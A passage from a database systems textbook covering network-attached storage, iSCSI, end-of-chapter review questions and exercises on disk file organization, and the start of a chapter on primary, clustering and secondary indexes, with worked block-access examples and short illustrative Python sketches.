SANs are growing very rapidly, but are still faced with many problems, such as combining storage options from multiple vendors and dealing with evolving standards of storage management software and hardware. Most major companies are evaluating SANs as a viable option for database storage.

11.2 Network-Attached Storage

With the phenomenal growth in digital data, particularly generated from multimedia and other enterprise applications, the need for high-performance storage solutions at low cost has become extremely important. Network-attached storage (NAS) devices are among the storage devices being used for this purpose. These devices are, in fact, servers that do not provide any of the common server services, but simply allow the addition of storage for file sharing. NAS devices allow vast amounts of hard-disk storage space to be added to a network and can make that space available to multiple servers without shutting them down for maintenance and upgrades. NAS devices can reside anywhere on a local area network (LAN) and may be combined in different configurations.
A single hardware device, often called the NAS box or NAS head, acts as the interface between the NAS system and network clients. These NAS devices require no monitor, keyboard, or mouse. One or more disk or tape drives can be attached to many NAS systems to increase total capacity. Clients connect to the NAS head rather than to the individual storage devices. An NAS can store any data that appears in the form of files, such as e-mail boxes, Web content, remote system backups, and so on. In that sense, NAS devices are being deployed as a replacement for traditional file servers.

NAS systems strive for reliable operation and easy administration. They include built-in features such as secure authentication, or the automatic sending of e-mail alerts in case of error on the device. The NAS devices (or appliances, as some vendors refer to them) are being offered with a high degree of scalability, reliability, flexibility, and performance. Such devices typically support RAID levels 0, 1, and 5.

Traditional storage area networks (SANs) differ from NAS in several ways. Specifically, SANs often utilize Fiber Channel rather than Ethernet, and a SAN often incorporates multiple network devices or endpoints on a self-contained or private LAN, whereas NAS relies on individual devices connected directly to the existing public LAN. Whereas Windows, UNIX, and NetWare file servers each demand specific protocol support on the client side, NAS systems claim greater operating system independence of clients.

11.3 iSCSI Storage Systems

A new protocol called iSCSI (Internet SCSI) has been proposed recently. It allows clients (called initiators) to send SCSI commands to SCSI storage devices on remote channels. The main advantage of iSCSI is that it does not require the special cabling needed by Fiber Channel and it can run over longer distances using existing network infrastructure. By carrying SCSI commands over IP networks, iSCSI facilitates data transfers over intranets and manages storage over long distances. It can transfer data over local area networks (LANs), wide area networks (WANs), or the Internet.

iSCSI works as follows. When a DBMS needs to access data, the operating system generates the appropriate SCSI commands and data request, which then go through encapsulation and, if necessary, encryption procedures. A packet header is added before the resulting IP packets are transmitted over an Ethernet connection. When a packet is received, it is decrypted (if it was encrypted before transmission) and disassembled, separating the SCSI commands and request. The SCSI commands go via the SCSI controller to the SCSI storage device. Because iSCSI is bidirectional, the protocol can also be used to return data in response to the original request. Cisco and IBM have marketed switches and routers based on this technology.

iSCSI storage has mainly impacted small- and medium-sized businesses because of its combination of simplicity, low cost, and the functionality of iSCSI devices. It allows them not to learn the ins and outs of Fiber Channel (FC) technology and instead benefit from their familiarity with the IP protocol and Ethernet hardware. iSCSI implementations in the data centers of very large enterprise businesses are slow in development due to their prior investment in Fiber Channel-based SANs.

iSCSI is one of two main approaches to storage data transmission over IP networks.
The other method, Fiber Channel over IP (FCIP), translates Fiber Channel control codes and data into IP packets for transmission between geographically distant Fiber Channel storage area networks. This protocol, known also as Fiber Channel tunneling or storage tunneling, can only be used in conjunction with Fiber Channel technology, whereas iSCSI can run over existing Ethernet networks.

The latest idea to enter the enterprise IP storage race is Fiber Channel over Ethernet (FCoE), which can be thought of as iSCSI without the IP. It uses many elements of SCSI and FC (just like iSCSI), but it does not include TCP/IP components. This promises excellent performance, especially on 10 Gigabit Ethernet (10GbE), and is relatively easy for vendors to add to their products.

12 Summary

We began this chapter by discussing the characteristics of memory hierarchies and then concentrated on secondary storage devices. In particular, we focused on magnetic disks because they are used most often to store online database files.

Data on disk is stored in blocks; accessing a disk block is expensive because of the seek time, rotational delay, and block transfer time. To reduce the average block access time, double buffering can be used when accessing consecutive disk blocks. We presented different ways of storing file records on disk. File records are grouped into disk blocks and can be fixed length or variable length, spanned or unspanned, and of the same record type or mixed types. We discussed the file header, which describes the record formats and keeps track of the disk addresses of the file blocks. Information in the file header is used by system software accessing the file records.

Then we presented a set of typical commands for accessing individual file records and discussed the concept of the current record of a file. We discussed how complex record search conditions are transformed into simple search conditions that are used to locate records in the file.

Three primary file organizations were then discussed: unordered, ordered, and hashed. Unordered files require a linear search to locate records, but record insertion is very simple. We discussed the deletion problem and the use of deletion markers.

Ordered files shorten the time required to read records in order of the ordering field. The time required to search for an arbitrary record, given the value of its ordering key field, is also reduced if a binary search is used. However, maintaining the records in order makes insertion very expensive; thus the technique of using an unordered overflow file to reduce the cost of record insertion was discussed. Overflow records are merged with the master file periodically during file reorganization.

Hashing provides very fast access to an arbitrary record of a file, given the value of its hash key. The most suitable method for external hashing is the bucket technique, with one or more contiguous blocks corresponding to each bucket. Collisions causing bucket overflow are handled by chaining. Access on any nonhash field is slow, and so is ordered access of the records on any field. We discussed three hashing techniques for files that grow and shrink in the number of records dynamically: extendible, dynamic, and linear hashing. The first two use the higher-order bits of the hash address to organize a directory. Linear hashing is geared to keep the load factor of the file within a given range and adds new buckets linearly.
We briefly discussed other possibilities for primary file organizations, such as B-trees, and files of mixed records, which implement relationships among records of different types physically as part of the storage structure. We reviewed the recent advances in disk technology represented by RAID (Redundant Arrays of Inexpensive (or Independent) Disks), which has become a standard technique in large enterprises to provide better reliability and fault tolerance features in storage. Finally, we reviewed three currently popular options in enterprise storage systems: storage area networks (SANs), network-attached storage (NAS), and iSCSI storage systems.

Review Questions
1. What is the difference between primary and secondary storage?
2. Why are disks, not tapes, used to store online database files?
3. Define the following terms: disk, disk pack, track, block, cylinder, sector, interblock gap, read/write head.
4. Discuss the process of disk initialization.
5. Discuss the mechanism used to read data from or write data to the disk.
6. What are the components of a disk block address?
7. Why is accessing a disk block expensive? Discuss the time components involved in accessing a disk block.
8. How does double buffering improve block access time?
9. What are the reasons for having variable-length records? What types of separator characters are needed for each?
10. Discuss the techniques for allocating file blocks on disk.
11. What is the difference between a file organization and an access method?
12. What is the difference between static and dynamic files?
13. What are the typical record-at-a-time operations for accessing a file? Which of these depend on the current file record?
14. Discuss the techniques for record deletion.
15. Discuss the advantages and disadvantages of using (a) an unordered file, (b) an ordered file, and (c) a static hash file with buckets and chaining. Which operations can be performed efficiently on each of these organizations, and which operations are expensive?
16. Discuss the techniques for allowing a hash file to expand and shrink dynamically. What are the advantages and disadvantages of each?
17. What is the difference between the directories of extendible and dynamic hashing?
18. What are mixed files used for? What are other types of primary file organizations?
19. Describe the mismatch between processor and disk technologies.
20. What are the main goals of the RAID technology? How does it achieve them?
21. How does disk mirroring help improve reliability? Give a quantitative example.
22. What characterizes the levels in RAID organization?
23. What are the highlights of the popular RAID levels 0, 1, and 5?
24. What are storage area networks? What flexibility and advantages do they offer?
25. Describe the main features of network-attached storage as an enterprise storage solution.
26. How have new iSCSI systems improved the applicability of storage area networks?

Exercises
27. Consider a disk with the following characteristics (these are not parameters of any particular disk unit): block size B = 512 bytes; interblock gap size G = 128 bytes; number of blocks per track = 20; number of tracks per surface = 400. A disk pack consists of 15 double-sided disks.
   a. What is the total capacity of a track, and what is its useful capacity (excluding interblock gaps)?
   b. How many cylinders are there?
   c. What are the total capacity and the useful capacity of a cylinder?
   d. What are the total capacity and the useful capacity of a disk pack?
   e. Suppose that the disk drive rotates the disk pack at a speed of 2400 rpm (revolutions per minute); what are the transfer rate (tr) in bytes/msec and the block transfer time (btt) in msec? What is the average rotational delay (rd) in msec? What is the bulk transfer rate?
   f. Suppose that the average seek time is 30 msec. How much time does it take (on the average) in msec to locate and transfer a single block, given its block address?
   g. Calculate the average time it would take to transfer 20 random blocks, and compare this with the time it would take to transfer 20 consecutive blocks using double buffering to save seek time and rotational delay.
28. A file has r = 20,000 STUDENT records of fixed length. Each record has the following fields: Name (30 bytes), Ssn (9 bytes), Address (40 bytes), Phone (10 bytes), Birth_date (8 bytes), Sex (1 byte), Major_dept_code (4 bytes), Minor_dept_code (4 bytes), Class_code (4 bytes, integer), and Degree_program (3 bytes). An additional byte is used as a deletion marker. The file is stored on the disk whose parameters are given in Exercise 27.
   a. Calculate the record size R in bytes.
   b. Calculate the blocking factor bfr and the number of file blocks b, assuming an unspanned organization.
   c. Calculate the average time it takes to find a record by doing a linear search on the file if (i) the file blocks are stored contiguously, and double buffering is used; (ii) the file blocks are not stored contiguously.
   d. Assume that the file is ordered by Ssn; by doing a binary search, calculate the time it takes to search for a record given its Ssn value.
29. Suppose that only 80 percent of the STUDENT records from Exercise 28 have a value for Phone, 85 percent for Major_dept_code, 15 percent for Minor_dept_code, and 90 percent for Degree_program; and suppose that we use a variable-length record file. Each record has a 1-byte field type for each field in the record, plus the 1-byte deletion marker and a 1-byte end-of-record marker. Suppose that we use a spanned record organization, where each block has a 5-byte pointer to the next block (this space is not used for record storage).
   a. Calculate the average record length R in bytes.
   b. Calculate the number of blocks needed for the file.
30. Suppose that a disk unit has the following parameters: seek time s = 20 msec; rotational delay rd = 10 msec; block transfer time btt = 1 msec; block size B = 2400 bytes; interblock gap size G = 600 bytes. An EMPLOYEE file has the following fields: Ssn, 9 bytes; Last_name, 20 bytes; First_name, 20 bytes; Middle_init, 1 byte; Birth_date, 10 bytes; Address, 35 bytes; Phone, 12 bytes; Supervisor_ssn, 9 bytes; Department, 4 bytes; Job_code, 4 bytes; deletion marker, 1 byte. The EMPLOYEE file has r = 30,000 records, fixed-length format, and unspanned blocking. Write appropriate formulas and calculate the following values for the above EMPLOYEE file:
   a. The record size R (including the deletion marker), the blocking factor bfr, and the number of disk blocks b.
   b. Calculate the wasted space in each disk block because of the unspanned organization.
   c. Calculate the transfer rate tr and the bulk transfer rate btr for this disk unit (see Appendix B for definitions of tr and btr).
   d. Calculate the average number of block accesses needed to search for an arbitrary record in the file, using linear search.
   e. Calculate in msec the average time needed to search for an arbitrary record in the file, using linear search, if the file blocks are stored on consecutive disk blocks and double buffering is used.
   f. Calculate in msec the average time needed to search for an arbitrary record in the file, using linear search, if the file blocks are not stored on consecutive disk blocks.
   g. Assume that the records are ordered via some key field. Calculate the average number of block accesses and the average time needed to search for an arbitrary record in the file, using binary search.
31. A PARTS file with Part# as the hash key includes records with the following Part# values: 2369, 3760, 4692, 4871, 5659, 1821, 1074, 7115, 1620, 2428, 3943, 4750, 6975, 4981, and 9208. The file uses eight buckets, numbered 0 to 7. Each bucket is one disk block and holds two records. Load these records into the file in the given order, using the hash function h(K) = K mod 8. Calculate the average number of block accesses for a random retrieval on Part#.
32. Load the records of Exercise 31 into expandable hash files based on extendible hashing. Show the structure of the directory at each step, and the global and local depths. Use the hash function h(K) = K mod 128.
33. Load the records of Exercise 31 into an expandable hash file, using linear hashing. Start with a single disk block, using the hash function h0 = K mod 2^0, and show how the file grows and how the hash functions change as the records are inserted. Assume that blocks are split whenever an overflow occurs, and show the value of n at each stage.
34. Compare the file commands listed in Section 5 to those available on a file access method you are familiar with.
35. Suppose that we have an unordered file of fixed-length records that uses an unspanned record organization. Outline algorithms for insertion, deletion, and modification of a file record. State any assumptions you make.
36. Suppose that we have an ordered file of fixed-length records and an unordered overflow file to handle insertion. Both files use unspanned records. Outline algorithms for insertion, deletion, and modification of a file record and for reorganizing the file. State any assumptions you make.
37. Can you think of techniques other than an unordered overflow file that can be used to make insertions in an ordered file more efficient?
38. Suppose that we have a hash file of fixed-length records, and suppose that overflow is handled by chaining. Outline algorithms for insertion, deletion, and modification of a file record. State any assumptions you make.
39. Can you think of techniques other than chaining to handle bucket overflow in external hashing?
40. Write pseudocode for the insertion algorithms for linear hashing and for extendible hashing.
41. Write program code to access individual fields of records under each of the following circumstances. For each case, state the assumptions you make concerning pointers, separator characters, and so on. Determine the type of information needed in the file header in order for your code to be general in each case.
   a. Fixed-length records with unspanned blocking
   b. Fixed-length records with spanned blocking
   c. Variable-length records with variable-length fields and spanned blocking
   d. Variable-length records with repeating groups and spanned blocking
   e. Variable-length records with optional fields and spanned blocking
   f. Variable-length records that allow all three cases in parts c, d, and e
42. Suppose that a file initially contains r = 120,000 records of R = 200 bytes each in an unsorted (heap) file. The block size B = 2400 bytes, the average seek time s = 16 ms, the average rotational latency rd = 8.3 ms, and the block transfer time btt = 0.8 ms. Assume that 1 record is deleted for every 2 records added until the total number of active records is 240,000.
   a. How many block transfers are needed to reorganize the file?
   b. How long does it take to find a record right before reorganization?
   c. How long does it take to find a record right after reorganization?
43. Suppose we have a sequential (ordered) file of 100,000 records where each record is 240 bytes. Assume that B = 2400 bytes, s = 16 ms, rd = 8.3 ms, and btt = 0.8 ms. Suppose we want to make X independent random record reads from the file. We could make X random block reads or we could perform one exhaustive read of the entire file looking for those X records. The question is to decide when it would be more efficient to perform one exhaustive read of the entire file than to perform X individual random reads. That is, what is the value for X when an exhaustive read of the file is more efficient than X random reads? Develop this as a function of X.
44. Suppose that a static hash file initially has 600 buckets in the primary area and that records are inserted that create an overflow area of 600 buckets. If we reorganize the hash file, we can assume that most of the overflow is eliminated. If the cost of reorganizing the file is the cost of the bucket transfers (reading and writing all of the buckets) and the only periodic file operation is the fetch operation, then how many times would we have to perform a fetch (successfully) to make the reorganization cost effective? That is, the reorganization cost and subsequent search cost must be less than the search cost before reorganization. Support your answer. Assume s = 16 ms, rd = 8.3 ms, and btt = 1 ms.
45. Suppose we want to create a linear hash file with a file load factor of 0.7 and a blocking factor of 20 records per bucket, which is to contain 112,000 records initially.
   a. How many buckets should we allocate in the primary area?
   b. What should be the number of bits used for bucket addresses?

Selected Bibliography
Wiederhold (1987) has a detailed discussion and analysis of secondary storage devices and file organizations as a part of database design. Optical disks are described in Berg and Roth (1989) and analyzed in Ford and Christodoulakis (1991). Flash memory is discussed by Dipert and Levy (1993). Ruemmler and Wilkes (1994) present a survey of the magnetic-disk technology. Most textbooks on databases include discussions of the material presented here. Most data structures textbooks, including Knuth (1998), discuss static hashing in more detail; Knuth has a complete discussion of hash functions and collision resolution techniques, as well as of their performance comparison. Knuth also offers a detailed discussion of techniques for sorting external files. Textbooks on file structures include Claybrook (1992), Smith and Barnes (1987), and Salzberg (1988); they discuss additional file organizations, including tree-structured files, and have detailed algorithms for operations on files. Salzberg et al. (1990) describe a distributed external sorting algorithm. File organizations with a high degree of fault tolerance are described by Bitton and Gray (1988) and by Gray et al. (1990). 
Disk striping was proposed in Salem and Garcia Molina (1986). The first paper on redundant arrays of inexpensive disks (RAID) is by Patterson et al. (1988). Chen and Patterson (1990) and the excellent survey of RAID by Chen et al. (1994) are additional references. Grochowski and Hoyt (1996) discuss future trends in disk drives. Various formulas for the RAID architecture appear in Chen et al. (1994).

Morris (1968) is an early paper on hashing. Extendible hashing is described in Fagin et al. (1979). Linear hashing is described by Litwin (1980). Algorithms for insertion and deletion for linear hashing are discussed with illustrations in Salzberg (1988). Dynamic hashing, which we briefly introduced, was proposed by Larson (1978). There are many proposed variations for extendible and linear hashing; for examples, see Cesarini and Soda (1991), Du and Tong (1991), and Hachem and Berra (1992).

Details of disk storage devices can be found at manufacturer sites (for example, http://www.seagate.com, http://www.ibm.com, http://www.emc.com, http://www.hp.com, and http://www.storagetek.com). IBM has a storage technology research center at IBM Almaden (http://www.almaden.ibm.com/).

Indexing Structures for Files

From Chapter 18 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-Wesley. All rights reserved.

In this chapter we assume that a file already exists with some primary organization such as the unordered, ordered, or hashed organizations. We will describe additional auxiliary access structures called indexes, which are used to speed up the retrieval of records in response to certain search conditions. The index structures are additional files on disk that provide secondary access paths, which provide alternative ways to access the records without affecting the physical placement of records in the primary data file on disk. They enable efficient access to records based on the indexing fields that are used to construct the index. Basically, any field of the file can be used to create an index, and multiple indexes on different fields—as well as indexes on multiple fields—can be constructed on the same file. A variety of indexes are possible; each of them uses a particular data structure to speed up the search.

To find a record or records in the data file based on a search condition on an indexing field, the index is searched, which leads to pointers to one or more disk blocks in the data file where the required records are located. The most prevalent types of indexes are based on ordered files (single-level indexes) and tree data structures (multilevel indexes, B+-trees). Indexes can also be constructed based on hashing or other search data structures. We also discuss indexes that are vectors of bits, called bitmap indexes.

We describe different types of single-level ordered indexes—primary, secondary, and clustering—in Section 1. By viewing a single-level index as an ordered file, one can develop additional indexes for it, giving rise to the concept of multilevel indexes. A popular indexing scheme called ISAM (Indexed Sequential Access Method) is based on this idea. We discuss multilevel tree-structured indexes in Section 2. In Section 3 we describe B-trees and B+-trees, which are data structures that are commonly used in DBMSs to implement dynamically changing multilevel indexes. B+-trees have become a commonly accepted default structure for 
generating indexes on demand in most relational DBMSs. Section 4 is devoted to alternative ways to access data based on a combination of multiple keys. In Section 5 we discuss hash indexes and introduce the concept of logical indexes, which give an additional level of indirection from physical indexes, allowing the physical index to be flexible and extensible in its organization. In Section 6 we discuss multikey indexing and bitmap indexes used for searching on one or more keys. Section 7 summarizes the chapter.

1 Types of Single-Level Ordered Indexes
The idea behind an ordered index is similar to that behind the index used in a textbook, which lists important terms at the end of the book in alphabetical order along with a list of page numbers where the term appears in the book. We can search the book index for a certain term in the textbook to find a list of addresses—page numbers in this case—and use these addresses to locate the specified pages first and then search for the term on each specified page. The alternative, if no other guidance is given, would be to sift slowly through the whole textbook word by word to find the term we are interested in; this corresponds to doing a linear search, which scans the whole file. Of course, most books do have additional information, such as chapter and section titles, which help us find a term without having to search through the whole book. However, the index is the only exact indication of the pages where each term occurs in the book.

For a file with a given record structure consisting of several fields (or attributes), an index access structure is usually defined on a single field of a file, called an indexing field (or indexing attribute).1 The index typically stores each value of the index field along with a list of pointers to all disk blocks that contain records with that field value. The values in the index are ordered so that we can do a binary search on the index. If both the data file and the index file are ordered, then, since the index file is typically much smaller than the data file, searching the index using a binary search is the better option. Tree-structured multilevel indexes (see Section 2) extend the binary search idea: instead of reducing the search space by 2-way partitioning at each search step, they divide the search space in the file n-ways at each stage, creating a more efficient approach.

Footnote 1: We use the terms field and attribute interchangeably in this chapter.

There are several types of ordered indexes. A primary index is specified on the ordering key field of an ordered file of records. Recall that an ordering key field is used to physically order the file records on disk, and every record has a unique value for that field. If the ordering field is not a key field—that is, if numerous records in the file can have the same value for the ordering field—another type of index, called a clustering index, can be used. The data file is called a clustered file in this latter case. Notice that a file can have at most one physical ordering field, so it can have at most one primary index or one clustering index, but not both. A third type of index, called a secondary index, can be specified on any nonordering field of a file. A data file can have several secondary indexes in addition to its primary access method. We discuss these types of single-level indexes in the next three subsections. 
1.1 Primary Indexes
A primary index is an ordered file whose records are of fixed length with two fields, and it acts like an access structure to efficiently search for and access the data records in a data file. The first field is of the same data type as the ordering key field—called the primary key—of the data file, and the second field is a pointer to a disk block (a block address). There is one index entry (or index record) in the index file for each block in the data file. Each index entry has the value of the primary key field for the first record in a block and a pointer to that block as its two field values. We will refer to the two field values of index entry i as <K(i), P(i)>.

To create a primary index on the ordered file shown in Figure A.1 (at the end of this chapter, in Appendix: Figures and Table), we use the Name field as primary key, because that is the ordering key field of the file (assuming that each value of Name is unique). Each entry in the index has a Name value and a pointer. The first three index entries are as follows:

<K(1) = (Aaron, Ed), P(1) = address of block 1>
<K(2) = (Adams, John), P(2) = address of block 2>
<K(3) = (Alexander, Ed), P(3) = address of block 3>

Figure 1 illustrates this primary index. The total number of entries in the index is
the same as the number of disk blocks in the ordered data file. The first record in each
block of the data file is called the anchor record of the block, or simply the block
anchor.2

Indexes can also be characterized as dense or sparse. A dense index has an index
entry for every search key value (and hence every record) in the data file. A sparse
(or nondense) index, on the other hand, has index entries for only some of the
search values. A sparse index has fewer entries than the number of records in the
file. Thus, a primary index is a nondense (sparse) index, since it includes an entry
for each disk block of the data file and the keys of its anchor record rather than for
every search value (or every record).
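
To make the sparse (nondense) primary index concrete, here is a minimal Python sketch. It simulates the data file as a small in-memory list of blocks ordered on the Name key; the block layout and the lookup function name are illustrative assumptions, not taken from the text.

```python
import bisect

# Hypothetical data file: blocks physically ordered on the primary key (Name).
data_blocks = [
    ["Aaron, Ed", "Abbot, Diane", "Acosta, Marc"],
    ["Adams, John", "Adams, Robin", "Akers, Jan"],
    ["Alexander, Ed", "Alfred, Bob", "Allen, Sam"],
]

# Sparse primary index: one <block anchor key, block pointer> entry per block.
index = [(blk[0], i) for i, blk in enumerate(data_blocks)]
anchor_keys = [k for k, _ in index]

def lookup(name):
    """Binary-search the block anchors, then scan the single candidate block."""
    i = bisect.bisect_right(anchor_keys, name) - 1   # entry with K(i) <= name < K(i+1)
    if i < 0:
        return None                                  # name precedes every anchor
    block_ptr = index[i][1]
    return name if name in data_blocks[block_ptr] else None

print(lookup("Akers, Jan"))    # found in block 1
print(lookup("Baker, Amy"))    # None: not in the file
```

The index has one entry per block rather than one per record, which is exactly why it stays much smaller than the data file.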

The index file for a primary index occupies a much smaller space than does the data
file, for two reasons. First, there are fewer index entries than there are records in the
data file. Second, each index entry is typically smaller in size than a data record
because it has only two fields; consequently, more index entries than data records
can fit in one block. Therefore, a binary search on the index file requires fewer block
accesses than a binary search on the data file. Referring to Table A.1, note that the
binary search for an ordered data file required ⎡log2(b)⎤ block accesses. But if the primary index file contains only bi blocks, then to locate a record with a search key value requires a binary search of that index and access to the block containing that record: a total of ⎡log2(bi)⎤ + 1 accesses.

Footnote 2: We can use a scheme similar to the one described here, with the last record in each block (rather than the first) as the block anchor. This slightly improves the efficiency of the search algorithm.

[Figure 1: Primary index on the ordering key field (Name) of the file shown in Figure A.1. Each index entry holds a block anchor primary key value and a block pointer; the anchor entries run from Aaron, Ed through Wright, Pam.]

A record whose primary key value is K lies in the block whose address is P(i), where
K(i) ≤ K < K(i + 1). The ith block in the data file contains all such records because of the physical ordering of the file records on the primary key field. To retrieve a record, given the value K of its primary key field, we do a binary search on the index file to find the appropriate index entry i, and then retrieve the data file block whose address is P(i).3 Example 1 illustrates the saving in block accesses that is attainable when a primary index is used to search for a record.

Footnote 3: Notice that the above formula would not be correct if the data file were ordered on a nonkey field; in that case the same index value in the block anchor could be repeated in the last records of the previous block.

Example 1. Suppose that we have an ordered file with r = 30,000 records stored on a disk with block size B = 1024 bytes. File records are of fixed size and are unspanned, with record length R = 100 bytes. The blocking factor for the file would be bfr = ⎣(B/R)⎦ = ⎣(1024/100)⎦ = 10 records per block. The number of blocks needed for the file is b = ⎡(r/bfr)⎤ = ⎡(30,000/10)⎤ = 3000 blocks. A binary search on the data file would need approximately ⎡log2(b)⎤ = ⎡log2(3000)⎤ = 12 block accesses.

Now suppose that the ordering key field of the file is V = 9 bytes long, a block pointer is P = 6 bytes long, and we have constructed a primary index for the file. The size of each index entry is Ri = (9 + 6) = 15 bytes, so the blocking factor for the index is bfri = ⎣(B/Ri)⎦ = ⎣(1024/15)⎦ = 68 entries per block. The total number of index entries ri is equal to the number of blocks in the data file, which is 3000. The number of index blocks is hence bi = ⎡(ri/bfri)⎤ = ⎡(3000/68)⎤ = 45 blocks. To perform a binary search on the index file would need ⎡log2(bi)⎤ = ⎡log2(45)⎤ = 6 block accesses. To search for a record using the index, we need one additional block access to the data file for a total of 6 + 1 = 7 block accesses—an improvement over binary search on the data file, which required 12 disk block accesses.

A major problem with a primary index—as with any ordered file—is insertion and deletion of records. With a primary index, the problem is compounded because if we attempt to insert a record in its correct position in the data file, we must not only move records to make space for the new record but also change some index entries, since moving records will change the anchor records of some blocks. Using an unordered overflow file can reduce this problem. Another possibility is to use a linked list of overflow records for each block in the data file. This is similar to the method of dealing with overflow records related to hashing. Records within each block and its overflow linked list can be sorted to improve retrieval time. Record deletion is handled using deletion markers.

1.2 Clustering Indexes
If file records are physically ordered on a nonkey field—which does not have a distinct value for each record—that field is called the clustering field and the data file is called a clustered file. We can create a different type of index, called a clustering index, to speed up retrieval of all the records that have the same value for the clustering field. This differs from a primary index, which requires that the ordering field of the data file have a distinct value for each record. A clustering index is also an ordered file with two fields; the first field is of the same type as the clustering field of the data file, and the second field is a disk block pointer.
There is one entry in the clustering index for each distinct value of the clustering field, and it contains the value and a pointer to the first block in the data file that has a record with that value for its clustering field. Figure 2 shows an example.

Notice that record insertion and deletion still cause problems because the data records are physically ordered. To alleviate the problem of insertion, it is common to reserve a whole block (or a cluster of contiguous blocks) for each value of the clustering field; all records with that value are placed in the block (or block cluster). This makes insertion and deletion relatively straightforward. Figure 3 shows this scheme.

A clustering index is another example of a nondense index because it has an entry for every distinct value of the indexing field, which is a nonkey by definition and hence has duplicate values rather than a unique value for every record in the file.

There is some similarity between Figures 1, 2, and 3 and Figures A.2 and A.3. An index is somewhat similar to dynamic hashing and to the directory structures used for extendible hashing. Both are searched to find a pointer to the data block containing the desired record. A main difference is that an index search uses the values of the search field itself, whereas a hash directory search uses the binary hash value that is calculated by applying the hash function to the search field.

1.3 Secondary Indexes
A secondary index provides a secondary means of accessing a data file for which some primary access already exists. The data file records could be ordered, unordered, or hashed. The secondary index may be created on a field that is a candidate key and has a unique value in every record, or on a nonkey field with duplicate values. The index is again an ordered file with two fields. The first field is of the same data type as some nonordering field of the data file that is an indexing field. The second field is either a block pointer or a record pointer. Many secondary indexes (and hence, indexing fields) can be created for the same file—each represents an additional means of accessing that file based on some specific field.

First we consider a secondary index access structure on a key (unique) field that has a distinct value for every record. Such a field is sometimes called a secondary key; in the relational model, this would correspond to any UNIQUE key attribute or to the primary key attribute of a table. In this case there is one index entry for each record in the data file, which contains the value of the field for the record and a pointer either to the block in which the record is stored or to the record itself. Hence, such an index is dense.

[Figure 2: A clustering index on the Dept_number ordering nonkey field of an EMPLOYEE file. Each index entry holds a clustering field value and a block pointer to the first data file block containing records with that Dept_number value.]

Again we refer to the two field values of index entry i as <K(i), P(i)>. The entries are ordered by value of K(i), so we can perform a binary search. Because the records of the data file are not physically ordered by values of the secondary key field, we cannot use block anchors. That is why an index entry is created for each record in the data file, rather than for each block, as in the case of a primary index. Figure 4 illustrates a secondary index in which the pointers P(i) in the index entries are block pointers, not record pointers. Once the appropriate disk block is transferred to a main memory buffer, a search for the desired record within the block can be carried out.

[Figure 3: Clustering index with a separate block cluster for each group of records that share the same value for the clustering field. The blocks holding each Dept_number value are chained by block pointers, with NULL pointers ending each chain.]

[Figure 4: A dense secondary index (with block pointers) on a nonordering key field of a file. There is one <index field value, block pointer> entry for every record in the data file.]


A secondary index usually needs more storage space and longer search time than
does a primary index, because of its larger number of entries. However, the
improvement in search time for an arbitrary record is much greater for a secondary
index than for a primary index, since we would have to do a linear search on the data
file if the secondary index did not exist. For a primary index, we could still use a
binary search on the main file, even if the index did not exist. Example 2 illustrates
the improvement in number of blocks accessed.

Example 2. Consider the file of Example 1 with r = 30,000 fixed-length records of
size R = 100 bytes stored on a disk with block size B = 1024 bytes. The file has b =
3000 blocks, as calculated in Example 1. Suppose we want to search for a record with
a specific value for the secondary key—a nonordering key field of the file that is V =
9 bytes long. Without the secondary index, to do a linear search on the file would
require b/2 = 3000/2 = 1500 block accesses on the average. Suppose that we con-
struct a secondary index on that nonordering key field of the file. As in Example 1, a
block pointer is P = 6 bytes long, so each index entry is Ri = (9 + 6) = 15 bytes, and
the blocking factor for the index is bfri = ⎣(B/Ri)⎦ = ⎣(1024/15)⎦ = 68 entries per
block. In a dense secondary index such as this, the total number of index entries ri is
equal to the number of records in the data file, which is 30,000. The number of blocks
needed for the index is hence bi = ⎡(ri/bfri)⎤ = ⎡(30,000/68)⎤ = 442 blocks.

A binary search on this secondary index needs ⎡(log2bi)⎤ = ⎡(log2442)⎤ = 9 block
accesses. To search for a record using the index, we need an additional block access
to the data file for a total of 9 + 1 = 10 block accesses—a vast improvement over the
1500 block accesses needed on the average for a linear search, but slightly worse than
the 7 block accesses required for the primary index. This difference arose because
the primary index was nondense and hence shorter, with only 45 blocks in length.
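
The arithmetic in Examples 1 and 2 follows directly from the blocking-factor and logarithm formulas above. Here is a minimal Python sketch of those calculations; the function names are illustrative, not from the text.

```python
import math

def blocking_factor(block_size, record_size):
    # bfr = floor(B / R)
    return block_size // record_size

def index_cost(num_entries, entry_size, block_size):
    """Blocks in a single-level index and the block accesses for one lookup
    (binary search on the index plus one access to the data file)."""
    bfr_i = blocking_factor(block_size, entry_size)
    b_i = math.ceil(num_entries / bfr_i)
    return b_i, math.ceil(math.log2(b_i)) + 1

B, R, r = 1024, 100, 30_000              # block size, record size, number of records
V, P = 9, 6                              # key size and block pointer size (entry = 15 bytes)

b = math.ceil(r / blocking_factor(B, R))                    # 3000 data blocks
print("binary search on data file:", math.ceil(math.log2(b)), "accesses")   # 12

bi, cost = index_cost(b, V + P, B)       # primary index: one entry per data block
print("primary index:", bi, "blocks,", cost, "accesses")    # 45 blocks, 7 accesses

bi, cost = index_cost(r, V + P, B)       # dense secondary index: one entry per record
print("secondary index:", bi, "blocks,", cost, "accesses")  # 442 blocks, 10 accesses
print("linear search average:", b // 2, "accesses")         # 1500 accesses
```

Running it reproduces the 12, 7, 10, and 1500 block-access figures quoted in the two examples.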

We can also create a secondary index on a nonkey, nonordering field of a file. In this
case, numerous records in the data file can have the same value for the indexing
field. There are several options for implementing such an index:

■ Option 1 is to include duplicate index entries with the same K(i) value—one
for each record. This would be a dense index.

■ Option 2 is to have variable-length records for the index entries, with a
repeating field for the pointer. We keep a list of pointers <P(i, 1), ..., P(i, k)>
in the index entry for K(i)—one pointer to each block that contains a record
whose indexing field value equals K(i). In either option 1 or option 2, the
binary search algorithm on the index must be modified appropriately to
account for a variable number of index entries per index key value.

■ Option 3, which is more commonly used, is to keep the index entries them-
selves at a fixed length and have a single entry for each index field value, but
to create an extra level of indirection to handle the multiple pointers. In this
nondense scheme, the pointer P(i) in index entry <K(i), P(i)> points to a
disk block, which contains a set of record pointers; each record pointer in that
disk block points to one of the data file records with value K(i) for the index-
ing field. If some value K(i) occurs in too many records, so that their record
pointers cannot fit in a single disk block, a cluster or linked list of blocks is

